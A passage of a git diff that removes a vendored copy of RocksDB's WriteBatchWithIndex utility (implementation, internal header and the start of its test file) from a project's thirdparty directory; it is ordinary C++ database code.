-    WriteBatchIndexEntry search_entry(WriteBatchIndexEntry::kFlagMin,
-                                      column_family_id_ + 1, 0, 0);
-    skip_list_iter_.Seek(&search_entry);
-    if (!skip_list_iter_.Valid()) {
-      skip_list_iter_.SeekToLast();
-    } else {
-      skip_list_iter_.Prev();
-    }
-  }
-
-  virtual void Seek(const Slice& key) override {
-    WriteBatchIndexEntry search_entry(&key, column_family_id_);
-    skip_list_iter_.Seek(&search_entry);
-  }
-
-  virtual void SeekForPrev(const Slice& key) override {
-    WriteBatchIndexEntry search_entry(&key, column_family_id_);
-    skip_list_iter_.SeekForPrev(&search_entry);
-  }
-
-  virtual void Next() override { skip_list_iter_.Next(); }
-
-  virtual void Prev() override { skip_list_iter_.Prev(); }
-
-  virtual WriteEntry Entry() const override {
-    WriteEntry ret;
-    Slice blob, xid;
-    const WriteBatchIndexEntry* iter_entry = skip_list_iter_.key();
-    // this is guaranteed with Valid()
-    assert(iter_entry != nullptr &&
-           iter_entry->column_family == column_family_id_);
-    auto s = write_batch_->GetEntryFromDataOffset(
-        iter_entry->offset, &ret.type, &ret.key, &ret.value, &blob, &xid);
-    assert(s.ok());
-    assert(ret.type == kPutRecord || ret.type == kDeleteRecord ||
-           ret.type == kSingleDeleteRecord || ret.type == kDeleteRangeRecord ||
-           ret.type == kMergeRecord);
-    return ret;
-  }
-
-  virtual Status status() const override {
-    // this is in-memory data structure, so the only way status can be non-ok is
-    // through memory corruption
-    return Status::OK();
-  }
-
-  const WriteBatchIndexEntry* GetRawEntry() const {
-    return skip_list_iter_.key();
-  }
-
- private:
-  uint32_t column_family_id_;
-  WriteBatchEntrySkipList::Iterator skip_list_iter_;
-  const ReadableWriteBatch* write_batch_;
-};
-
-struct WriteBatchWithIndex::Rep {
-  explicit Rep(const Comparator* index_comparator, size_t reserved_bytes = 0,
-               size_t max_bytes = 0, bool _overwrite_key = false)
-      : write_batch(reserved_bytes, max_bytes),
-        comparator(index_comparator, &write_batch),
-        skip_list(comparator, &arena),
-        overwrite_key(_overwrite_key),
-        last_entry_offset(0) {}
-  ReadableWriteBatch write_batch;
-  WriteBatchEntryComparator comparator;
-  Arena arena;
-  WriteBatchEntrySkipList skip_list;
-  bool overwrite_key;
-  size_t last_entry_offset;
-
-  // Remember current offset of internal write batch, which is used as
-  // the starting offset of the next record.
-  void SetLastEntryOffset() { last_entry_offset = write_batch.GetDataSize(); }
-
-  // In overwrite mode, find the existing entry for the same key and update it
-  // to point to the current entry.
-  // Return true if the key is found and updated.
-  bool UpdateExistingEntry(ColumnFamilyHandle* column_family, const Slice& key);
-  bool UpdateExistingEntryWithCfId(uint32_t column_family_id, const Slice& key);
-
-  // Add the recent entry to the update.
-  // In overwrite mode, if key already exists in the index, update it.
-  void AddOrUpdateIndex(ColumnFamilyHandle* column_family, const Slice& key);
-  void AddOrUpdateIndex(const Slice& key);
-
-  // Allocate an index entry pointing to the last entry in the write batch and
-  // put it to skip list.
-  void AddNewEntry(uint32_t column_family_id);
-
-  // Clear all updates buffered in this batch.
-  void Clear();
-  void ClearIndex();
-
-  // Rebuild index by reading all records from the batch.
-  // Returns non-ok status on corruption.
-  Status ReBuildIndex();
-};
-
-bool WriteBatchWithIndex::Rep::UpdateExistingEntry(
-    ColumnFamilyHandle* column_family, const Slice& key) {
-  uint32_t cf_id = GetColumnFamilyID(column_family);
-  return UpdateExistingEntryWithCfId(cf_id, key);
-}
-
-bool WriteBatchWithIndex::Rep::UpdateExistingEntryWithCfId(
-    uint32_t column_family_id, const Slice& key) {
-  if (!overwrite_key) {
-    return false;
-  }
-
-  WBWIIteratorImpl iter(column_family_id, &skip_list, &write_batch);
-  iter.Seek(key);
-  if (!iter.Valid()) {
-    return false;
-  }
-  if (comparator.CompareKey(column_family_id, key, iter.Entry().key) != 0) {
-    return false;
-  }
-  WriteBatchIndexEntry* non_const_entry =
-      const_cast<WriteBatchIndexEntry*>(iter.GetRawEntry());
-  non_const_entry->offset = last_entry_offset;
-  return true;
-}
-
-void WriteBatchWithIndex::Rep::AddOrUpdateIndex(
-    ColumnFamilyHandle* column_family, const Slice& key) {
-  if (!UpdateExistingEntry(column_family, key)) {
-    uint32_t cf_id = GetColumnFamilyID(column_family);
-    const auto* cf_cmp = GetColumnFamilyUserComparator(column_family);
-    if (cf_cmp != nullptr) {
-      comparator.SetComparatorForCF(cf_id, cf_cmp);
-    }
-    AddNewEntry(cf_id);
-  }
-}
-
-void WriteBatchWithIndex::Rep::AddOrUpdateIndex(const Slice& key) {
-  if (!UpdateExistingEntryWithCfId(0, key)) {
-    AddNewEntry(0);
-  }
-}
-
-void WriteBatchWithIndex::Rep::AddNewEntry(uint32_t column_family_id) {
-  const std::string& wb_data = write_batch.Data();
-  Slice entry_ptr = Slice(wb_data.data() + last_entry_offset,
-                          wb_data.size() - last_entry_offset);
-  // Extract key
-  Slice key;
-  bool success __attribute__((__unused__)) =
-      ReadKeyFromWriteBatchEntry(&entry_ptr, &key, column_family_id != 0);
-  assert(success);
-
-    auto* mem = arena.Allocate(sizeof(WriteBatchIndexEntry));
-    auto* index_entry =
-        new (mem) WriteBatchIndexEntry(last_entry_offset, column_family_id,
-                                       key.data() - wb_data.data(), key.size());
-    skip_list.Insert(index_entry);
-  }
-
-  void WriteBatchWithIndex::Rep::Clear() {
-    write_batch.Clear();
-    ClearIndex();
-  }
-
-  void WriteBatchWithIndex::Rep::ClearIndex() {
-    skip_list.~WriteBatchEntrySkipList();
-    arena.~Arena();
-    new (&arena) Arena();
-    new (&skip_list) WriteBatchEntrySkipList(comparator, &arena);
-    last_entry_offset = 0;
-  }
-
-  Status WriteBatchWithIndex::Rep::ReBuildIndex() {
-    Status s;
-
-    ClearIndex();
-
-    if (write_batch.Count() == 0) {
-      // Nothing to re-index
-      return s;
-    }
-
-    size_t offset = WriteBatchInternal::GetFirstOffset(&write_batch);
-
-    Slice input(write_batch.Data());
-    input.remove_prefix(offset);
-
-    // Loop through all entries in Rep and add each one to the index
-    int found = 0;
-    while (s.ok() && !input.empty()) {
-      Slice key, value, blob, xid;
-      uint32_t column_family_id = 0;  // default
-      char tag = 0;
-
-      // set offset of current entry for call to AddNewEntry()
-      last_entry_offset = input.data() - write_batch.Data().data();
-
-      s = ReadRecordFromWriteBatch(&input, &tag, &column_family_id, &key,
-                                   &value, &blob, &xid);
-      if (!s.ok()) {
-        break;
-      }
-
-      switch (tag) {
-        case kTypeColumnFamilyValue:
-        case kTypeValue:
-        case kTypeColumnFamilyDeletion:
-        case kTypeDeletion:
-        case kTypeColumnFamilySingleDeletion:
-        case kTypeSingleDeletion:
-        case kTypeColumnFamilyMerge:
-        case kTypeMerge:
-          found++;
-          if (!UpdateExistingEntryWithCfId(column_family_id, key)) {
-            AddNewEntry(column_family_id);
-          }
-          break;
-        case kTypeLogData:
-        case kTypeBeginPrepareXID:
-        case kTypeEndPrepareXID:
-        case kTypeCommitXID:
-        case kTypeRollbackXID:
-        case kTypeNoop:
-          break;
-        default:
-          return Status::Corruption("unknown WriteBatch tag");
-      }
-    }
-
-    if (s.ok() && found != write_batch.Count()) {
-      s = Status::Corruption("WriteBatch has wrong count");
-    }
-
-    return s;
-  }
-
-  WriteBatchWithIndex::WriteBatchWithIndex(
-      const Comparator* default_index_comparator, size_t reserved_bytes,
-      bool overwrite_key, size_t max_bytes)
-      : rep(new Rep(default_index_comparator, reserved_bytes, max_bytes,
-                    overwrite_key)) {}
-
-  WriteBatchWithIndex::~WriteBatchWithIndex() {}
-
-  WriteBatch* WriteBatchWithIndex::GetWriteBatch() { return &rep->write_batch; }
-
-  WBWIIterator* WriteBatchWithIndex::NewIterator() {
-    return new WBWIIteratorImpl(0, &(rep->skip_list), &rep->write_batch);
-}
-
-WBWIIterator* WriteBatchWithIndex::NewIterator(
-    ColumnFamilyHandle* column_family) {
-  return new WBWIIteratorImpl(GetColumnFamilyID(column_family),
-                              &(rep->skip_list), &rep->write_batch);
-}
-
-Iterator* WriteBatchWithIndex::NewIteratorWithBase(
-    ColumnFamilyHandle* column_family, Iterator* base_iterator) {
-  if (rep->overwrite_key == false) {
-    assert(false);
-    return nullptr;
-  }
-  return new BaseDeltaIterator(base_iterator, NewIterator(column_family),
-                               GetColumnFamilyUserComparator(column_family));
-}
-
-Iterator* WriteBatchWithIndex::NewIteratorWithBase(Iterator* base_iterator) {
-  if (rep->overwrite_key == false) {
-    assert(false);
-    return nullptr;
-  }
-  // default column family's comparator
-  return new BaseDeltaIterator(base_iterator, NewIterator(),
-                               rep->comparator.default_comparator());
-}
-
-Status WriteBatchWithIndex::Put(ColumnFamilyHandle* column_family,
-                                const Slice& key, const Slice& value) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.Put(column_family, key, value);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(column_family, key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::Put(const Slice& key, const Slice& value) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.Put(key, value);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::Delete(ColumnFamilyHandle* column_family,
-                                   const Slice& key) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.Delete(column_family, key);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(column_family, key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::Delete(const Slice& key) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.Delete(key);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::SingleDelete(ColumnFamilyHandle* column_family,
-                                         const Slice& key) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.SingleDelete(column_family, key);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(column_family, key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::SingleDelete(const Slice& key) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.SingleDelete(key);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::DeleteRange(ColumnFamilyHandle* column_family,
-                                        const Slice& begin_key,
-                                        const Slice& end_key) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.DeleteRange(column_family, begin_key, end_key);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(column_family, begin_key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::DeleteRange(const Slice& begin_key,
-                                        const Slice& end_key) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.DeleteRange(begin_key, end_key);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(begin_key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::Merge(ColumnFamilyHandle* column_family,
-                                  const Slice& key, const Slice& value) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.Merge(column_family, key, value);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(column_family, key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::Merge(const Slice& key, const Slice& value) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.Merge(key, value);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::PutLogData(const Slice& blob) {
-  return rep->write_batch.PutLogData(blob);
-}
-
-void WriteBatchWithIndex::Clear() { rep->Clear(); }
-
-Status WriteBatchWithIndex::GetFromBatch(ColumnFamilyHandle* column_family,
-                                         const DBOptions& options,
-                                         const Slice& key, std::string* value) {
-  Status s;
-  MergeContext merge_context;
-  const ImmutableDBOptions immuable_db_options(options);
-
-  WriteBatchWithIndexInternal::Result result =
-      WriteBatchWithIndexInternal::GetFromBatch(
-          immuable_db_options, this, column_family, key, &merge_context,
-          &rep->comparator, value, rep->overwrite_key, &s);
-
-  switch (result) {
-    case WriteBatchWithIndexInternal::Result::kFound:
-    case WriteBatchWithIndexInternal::Result::kError:
-      // use returned status
-      break;
-    case WriteBatchWithIndexInternal::Result::kDeleted:
-    case WriteBatchWithIndexInternal::Result::kNotFound:
-      s = Status::NotFound();
-      break;
-    case WriteBatchWithIndexInternal::Result::kMergeInProgress:
-      s = Status::MergeInProgress();
-      break;
-    default:
-      assert(false);
-  }
-
-  return s;
-}
-
-Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db,
-                                              const ReadOptions& read_options,
-                                              const Slice& key,
-                                              std::string* value) {
-  assert(value != nullptr);
-  PinnableSlice pinnable_val(value);
-  assert(!pinnable_val.IsPinned());
-  auto s = GetFromBatchAndDB(db, read_options, db->DefaultColumnFamily(), key,
-                             &pinnable_val);
-  if (s.ok() && pinnable_val.IsPinned()) {
-    value->assign(pinnable_val.data(), pinnable_val.size());
-  }  // else value is already assigned
-  return s;
-}
-
-Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db,
-                                              const ReadOptions& read_options,
-                                              const Slice& key,
-                                              PinnableSlice* pinnable_val) {
-  return GetFromBatchAndDB(db, read_options, db->DefaultColumnFamily(), key,
-                           pinnable_val);
-}
-
-Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db,
-                                              const ReadOptions& read_options,
-                                              ColumnFamilyHandle* column_family,
-                                              const Slice& key,
-                                              std::string* value) {
-  assert(value != nullptr);
-  PinnableSlice pinnable_val(value);
-  assert(!pinnable_val.IsPinned());
-  auto s =
-      GetFromBatchAndDB(db, read_options, column_family, key, &pinnable_val);
-  if (s.ok() && pinnable_val.IsPinned()) {
-    value->assign(pinnable_val.data(), pinnable_val.size());
-  }  // else value is already assigned
-  return s;
-}
-
-Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db,
-                                              const ReadOptions& read_options,
-                                              ColumnFamilyHandle* column_family,
-                                              const Slice& key,
-                                              PinnableSlice* pinnable_val) {
-  Status s;
-  MergeContext merge_context;
-  const ImmutableDBOptions& immuable_db_options =
-      reinterpret_cast<DBImpl*>(db)->immutable_db_options();
-
-  // Since the lifetime of the WriteBatch is the same as that of the transaction
-  // we cannot pin it as otherwise the returned value will not be available
-  // after the transaction finishes.
-  std::string& batch_value = *pinnable_val->GetSelf();
-  WriteBatchWithIndexInternal::Result result =
-      WriteBatchWithIndexInternal::GetFromBatch(
-          immuable_db_options, this, column_family, key, &merge_context,
-          &rep->comparator, &batch_value, rep->overwrite_key, &s);
-
-  if (result == WriteBatchWithIndexInternal::Result::kFound) {
-    pinnable_val->PinSelf();
-    return s;
-  }
-  if (result == WriteBatchWithIndexInternal::Result::kDeleted) {
-    return Status::NotFound();
-  }
-  if (result == WriteBatchWithIndexInternal::Result::kError) {
-    return s;
-  }
-  if (result == WriteBatchWithIndexInternal::Result::kMergeInProgress &&
-      rep->overwrite_key == true) {
-    // Since we've overwritten keys, we do not know what other operations are
-    // in this batch for this key, so we cannot do a Merge to compute the
-    // result.  Instead, we will simply return MergeInProgress.
-    return Status::MergeInProgress();
-  }
-
-  assert(result == WriteBatchWithIndexInternal::Result::kMergeInProgress ||
-         result == WriteBatchWithIndexInternal::Result::kNotFound);
-
-  // Did not find key in batch OR could not resolve Merges.  Try DB.
-  s = db->Get(read_options, column_family, key, pinnable_val);
-
-  if (s.ok() || s.IsNotFound()) {  // DB Get Succeeded
-    if (result == WriteBatchWithIndexInternal::Result::kMergeInProgress) {
-      // Merge result from DB with merges in Batch
-      auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-      const MergeOperator* merge_operator =
-          cfh->cfd()->ioptions()->merge_operator;
-      Statistics* statistics = immuable_db_options.statistics.get();
-      Env* env = immuable_db_options.env;
-      Logger* logger = immuable_db_options.info_log.get();
-
-      Slice* merge_data;
-      if (s.ok()) {
-        merge_data = pinnable_val;
-      } else {  // Key not present in db (s.IsNotFound())
-        merge_data = nullptr;
-      }
-
-      if (merge_operator) {
-        s = MergeHelper::TimedFullMerge(
-            merge_operator, key, merge_data, merge_context.GetOperands(),
-            pinnable_val->GetSelf(), logger, statistics, env);
-        pinnable_val->PinSelf();
-      } else {
-        s = Status::InvalidArgument("Options::merge_operator must be set");
-      }
-    }
-  }
-
-  return s;
-}
-
-void WriteBatchWithIndex::SetSavePoint() { rep->write_batch.SetSavePoint(); }
-
-Status WriteBatchWithIndex::RollbackToSavePoint() {
-  Status s = rep->write_batch.RollbackToSavePoint();
-
-  if (s.ok()) {
-    s = rep->ReBuildIndex();
-  }
-
-  return s;
-}
-
-Status WriteBatchWithIndex::PopSavePoint() {
-  return rep->write_batch.PopSavePoint();
-}
-
-void WriteBatchWithIndex::SetMaxBytes(size_t max_bytes) {
-  rep->write_batch.SetMaxBytes(max_bytes);
-}
-
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_internal.cc b/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_internal.cc
deleted file mode 100644
index 385d16f..0000000
--- a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_internal.cc
+++ /dev/null
@@ -1,269 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/write_batch_with_index/write_batch_with_index_internal.h"
-
-#include "db/column_family.h"
-#include "db/merge_context.h"
-#include "db/merge_helper.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-class Env;
-class Logger;
-class Statistics;
-
-Status ReadableWriteBatch::GetEntryFromDataOffset(size_t data_offset,
-                                                  WriteType* type, Slice* Key,
-                                                  Slice* value, Slice* blob,
-                                                  Slice* xid) const {
-  if (type == nullptr || Key == nullptr || value == nullptr ||
-      blob == nullptr || xid == nullptr) {
-    return Status::InvalidArgument("Output parameters cannot be null");
-  }
-
-  if (data_offset == GetDataSize()) {
-    // reached end of batch.
-    return Status::NotFound();
-  }
-
-  if (data_offset > GetDataSize()) {
-    return Status::InvalidArgument("data offset exceed write batch size");
-  }
-  Slice input = Slice(rep_.data() + data_offset, rep_.size() - data_offset);
-  char tag;
-  uint32_t column_family;
-  Status s = ReadRecordFromWriteBatch(&input, &tag, &column_family, Key, value,
-                                      blob, xid);
-
-  switch (tag) {
-    case kTypeColumnFamilyValue:
-    case kTypeValue:
-      *type = kPutRecord;
-      break;
-    case kTypeColumnFamilyDeletion:
-    case kTypeDeletion:
-      *type = kDeleteRecord;
-      break;
-    case kTypeColumnFamilySingleDeletion:
-    case kTypeSingleDeletion:
-      *type = kSingleDeleteRecord;
-      break;
-    case kTypeColumnFamilyRangeDeletion:
-    case kTypeRangeDeletion:
-      *type = kDeleteRangeRecord;
-      break;
-    case kTypeColumnFamilyMerge:
-    case kTypeMerge:
-      *type = kMergeRecord;
-      break;
-    case kTypeLogData:
-      *type = kLogDataRecord;
-      break;
-    case kTypeBeginPrepareXID:
-    case kTypeEndPrepareXID:
-    case kTypeCommitXID:
-    case kTypeRollbackXID:
-      *type = kXIDRecord;
-      break;
-    default:
-      return Status::Corruption("unknown WriteBatch tag");
-  }
-  return Status::OK();
-}
-
-int WriteBatchEntryComparator::operator()(
-    const WriteBatchIndexEntry* entry1,
-    const WriteBatchIndexEntry* entry2) const {
-  if (entry1->column_family > entry2->column_family) {
-    return 1;
-  } else if (entry1->column_family < entry2->column_family) {
-    return -1;
-  }
-
-  if (entry1->offset == WriteBatchIndexEntry::kFlagMin) {
-    return -1;
-  } else if (entry2->offset == WriteBatchIndexEntry::kFlagMin) {
-    return 1;
-  }
-
-  Slice key1, key2;
-  if (entry1->search_key == nullptr) {
-    key1 = Slice(write_batch_->Data().data() + entry1->key_offset,
-                 entry1->key_size);
-  } else {
-    key1 = *(entry1->search_key);
-  }
-  if (entry2->search_key == nullptr) {
-    key2 = Slice(write_batch_->Data().data() + entry2->key_offset,
-                 entry2->key_size);
-  } else {
-    key2 = *(entry2->search_key);
-  }
-
-  int cmp = CompareKey(entry1->column_family, key1, key2);
-  if (cmp != 0) {
-    return cmp;
-  } else if (entry1->offset > entry2->offset) {
-    return 1;
-  } else if (entry1->offset < entry2->offset) {
-    return -1;
-  }
-  return 0;
-}
-
-int WriteBatchEntryComparator::CompareKey(uint32_t column_family,
-                                          const Slice& key1,
-                                          const Slice& key2) const {
-  if (column_family < cf_comparators_.size() &&
-      cf_comparators_[column_family] != nullptr) {
-    return cf_comparators_[column_family]->Compare(key1, key2);
-  } else {
-    return default_comparator_->Compare(key1, key2);
-  }
-}
-
-WriteBatchWithIndexInternal::Result WriteBatchWithIndexInternal::GetFromBatch(
-    const ImmutableDBOptions& immuable_db_options, WriteBatchWithIndex* batch,
-    ColumnFamilyHandle* column_family, const Slice& key,
-    MergeContext* merge_context, WriteBatchEntryComparator* cmp,
-    std::string* value, bool overwrite_key, Status* s) {
-  uint32_t cf_id = GetColumnFamilyID(column_family);
-  *s = Status::OK();
-  WriteBatchWithIndexInternal::Result result =
-      WriteBatchWithIndexInternal::Result::kNotFound;
-
-  std::unique_ptr<WBWIIterator> iter =
-      std::unique_ptr<WBWIIterator>(batch->NewIterator(column_family));
-
-  // We want to iterate in the reverse order that the writes were added to the
-  // batch.  Since we don't have a reverse iterator, we must seek past the end.
-  // TODO(agiardullo): consider adding support for reverse iteration
-  iter->Seek(key);
-  while (iter->Valid()) {
-    const WriteEntry entry = iter->Entry();
-    if (cmp->CompareKey(cf_id, entry.key, key) != 0) {
-      break;
-    }
-
-    iter->Next();
-  }
-
-  if (!(*s).ok()) {
-    return WriteBatchWithIndexInternal::Result::kError;
-  }
-
-  if (!iter->Valid()) {
-    // Read past end of results.  Reposition on last result.
-    iter->SeekToLast();
-  } else {
-    iter->Prev();
-  }
-
-  Slice entry_value;
-  while (iter->Valid()) {
-    const WriteEntry entry = iter->Entry();
-    if (cmp->CompareKey(cf_id, entry.key, key) != 0) {
-      // Unexpected error or we've reached a different next key
-      break;
-    }
-
-    switch (entry.type) {
-      case kPutRecord: {
-        result = WriteBatchWithIndexInternal::Result::kFound;
-        entry_value = entry.value;
-        break;
-      }
-      case kMergeRecord: {
-        result = WriteBatchWithIndexInternal::Result::kMergeInProgress;
-        merge_context->PushOperand(entry.value);
-        break;
-      }
-      case kDeleteRecord:
-      case kSingleDeleteRecord: {
-        result = WriteBatchWithIndexInternal::Result::kDeleted;
-        break;
-      }
-      case kLogDataRecord:
-      case kXIDRecord: {
-        // ignore
-        break;
-      }
-      default: {
-        result = WriteBatchWithIndexInternal::Result::kError;
-        (*s) = Status::Corruption("Unexpected entry in WriteBatchWithIndex:",
-                                  ToString(entry.type));
-        break;
-      }
-    }
-    if (result == WriteBatchWithIndexInternal::Result::kFound ||
-        result == WriteBatchWithIndexInternal::Result::kDeleted ||
-        result == WriteBatchWithIndexInternal::Result::kError) {
-      // We can stop iterating once we find a PUT or DELETE
-      break;
-    }
-    if (result == WriteBatchWithIndexInternal::Result::kMergeInProgress &&
-        overwrite_key == true) {
-      // Since we've overwritten keys, we do not know what other operations are
-      // in this batch for this key, so we cannot do a Merge to compute the
-      // result.  Instead, we will simply return MergeInProgress.
-      break;
-    }
-
-    iter->Prev();
-  }
-
-  if ((*s).ok()) {
-    if (result == WriteBatchWithIndexInternal::Result::kFound ||
-        result == WriteBatchWithIndexInternal::Result::kDeleted) {
-      // Found a Put or Delete.  Merge if necessary.
-      if (merge_context->GetNumOperands() > 0) {
-        const MergeOperator* merge_operator;
-
-        if (column_family != nullptr) {
-          auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-          merge_operator = cfh->cfd()->ioptions()->merge_operator;
-        } else {
-          *s = Status::InvalidArgument("Must provide a column_family");
-          result = WriteBatchWithIndexInternal::Result::kError;
-          return result;
-        }
-        Statistics* statistics = immuable_db_options.statistics.get();
-        Env* env = immuable_db_options.env;
-        Logger* logger = immuable_db_options.info_log.get();
-
-        if (merge_operator) {
-          *s = MergeHelper::TimedFullMerge(merge_operator, key, &entry_value,
-                                           merge_context->GetOperands(), value,
-                                           logger, statistics, env);
-        } else {
-          *s = Status::InvalidArgument("Options::merge_operator must be set");
-        }
-        if ((*s).ok()) {
-          result = WriteBatchWithIndexInternal::Result::kFound;
-        } else {
-          result = WriteBatchWithIndexInternal::Result::kError;
-        }
-      } else {  // nothing to merge
-        if (result == WriteBatchWithIndexInternal::Result::kFound) {  // PUT
-          value->assign(entry_value.data(), entry_value.size());
-        }
-      }
-    }
-  }
-
-  return result;
-}
-
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_internal.h b/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_internal.h
deleted file mode 100644
index ac20f1b..0000000
--- a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_internal.h
+++ /dev/null
@@ -1,114 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <limits>
-#include <string>
-#include <vector>
-
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-
-namespace rocksdb {
-
-class MergeContext;
-struct Options;
-
-// Key used by skip list, as the binary searchable index of WriteBatchWithIndex.
-struct WriteBatchIndexEntry {
-  WriteBatchIndexEntry(size_t o, uint32_t c, size_t ko, size_t ksz)
-      : offset(o),
-        column_family(c),
-        key_offset(ko),
-        key_size(ksz),
-        search_key(nullptr) {}
-  WriteBatchIndexEntry(const Slice* sk, uint32_t c)
-      : offset(0),
-        column_family(c),
-        key_offset(0),
-        key_size(0),
-        search_key(sk) {}
-
-  // If this flag appears in the offset, it indicates a key that is smaller
-  // than any other entry for the same column family
-  static const size_t kFlagMin = port::kMaxSizet;
-
-  size_t offset;           // offset of an entry in write batch's string buffer.
-  uint32_t column_family;  // column family of the entry.
-  size_t key_offset;       // offset of the key in write batch's string buffer.
-  size_t key_size;         // size of the key.
-
-  const Slice* search_key;  // if not null, instead of reading keys from
-                            // write batch, use it to compare. This is used
-                            // for lookup key.
-};
-
-class ReadableWriteBatch : public WriteBatch {
- public:
-  explicit ReadableWriteBatch(size_t reserved_bytes = 0, size_t max_bytes = 0)
-      : WriteBatch(reserved_bytes, max_bytes) {}
-  // Retrieve some information from a write entry in the write batch, given
-  // the start offset of the write entry.
-  Status GetEntryFromDataOffset(size_t data_offset, WriteType* type, Slice* Key,
-                                Slice* value, Slice* blob, Slice* xid) const;
-};
-
-class WriteBatchEntryComparator {
- public:
-  WriteBatchEntryComparator(const Comparator* _default_comparator,
-                            const ReadableWriteBatch* write_batch)
-      : default_comparator_(_default_comparator), write_batch_(write_batch) {}
-  // Compare a and b. Return a negative value if a is less than b, 0 if they
-  // are equal, and a positive value if a is greater than b
-  int operator()(const WriteBatchIndexEntry* entry1,
-                 const WriteBatchIndexEntry* entry2) const;
-
-  int CompareKey(uint32_t column_family, const Slice& key1,
-                 const Slice& key2) const;
-
-  void SetComparatorForCF(uint32_t column_family_id,
-                          const Comparator* comparator) {
-    if (column_family_id >= cf_comparators_.size()) {
-      cf_comparators_.resize(column_family_id + 1, nullptr);
-    }
-    cf_comparators_[column_family_id] = comparator;
-  }
-
-  const Comparator* default_comparator() { return default_comparator_; }
-
- private:
-  const Comparator* default_comparator_;
-  std::vector<const Comparator*> cf_comparators_;
-  const ReadableWriteBatch* write_batch_;
-};
-
-class WriteBatchWithIndexInternal {
- public:
-  enum Result { kFound, kDeleted, kNotFound, kMergeInProgress, kError };
-
-  // If batch contains a value for key, store it in *value and return kFound.
-  // If batch contains a deletion for key, return Deleted.
-  // If batch contains Merge operations as the most recent entry for a key,
-  //   and the merge process does not stop (not reaching a value or delete),
-  //   prepend the current merge operands to *operands,
-  //   and return kMergeInProgress
-  // If batch does not contain this key, return kNotFound
-  // Else, return kError on error with error Status stored in *s.
-  static WriteBatchWithIndexInternal::Result GetFromBatch(
-      const ImmutableDBOptions& ioptions, WriteBatchWithIndex* batch,
-      ColumnFamilyHandle* column_family, const Slice& key,
-      MergeContext* merge_context, WriteBatchEntryComparator* cmp,
-      std::string* value, bool overwrite_key, Status* s);
-};
-
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_test.cc b/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_test.cc
deleted file mode 100644
index 5b1250a..0000000
--- a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_test.cc
+++ /dev/null
@@ -1,1805 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include <memory>
-#include <map>
-#include "db/column_family.h"
-#include "port/stack_trace.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "util/random.h"
